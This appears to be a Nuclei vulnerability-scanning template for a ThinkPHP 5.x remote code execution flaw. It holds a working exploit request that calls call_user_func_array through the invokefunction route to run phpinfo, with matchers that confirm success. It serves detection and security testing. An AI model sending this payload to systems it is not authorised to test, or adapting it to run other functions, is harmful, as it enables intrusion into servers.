id: thinkphp-5022-rce info: name: ThinkPHP - Remote Code Execution author: dr_set severity: critical description: ThinkPHP 5.0.22 and 5.1.29 are susceptible to remote code execution if the website doesn't have mandatory routing enabled, which is the default setting. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce tags: thinkphp,rce metadata: max-request: 1 http: - method: GET path: - "{{BaseURL}}?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1" matchers-condition: and matchers: - type: word words: - "PHP Extension" - "PHP Version" - "ThinkPHP" condition: and - type: status status: - 200 # Enhanced by md on 2022/10/05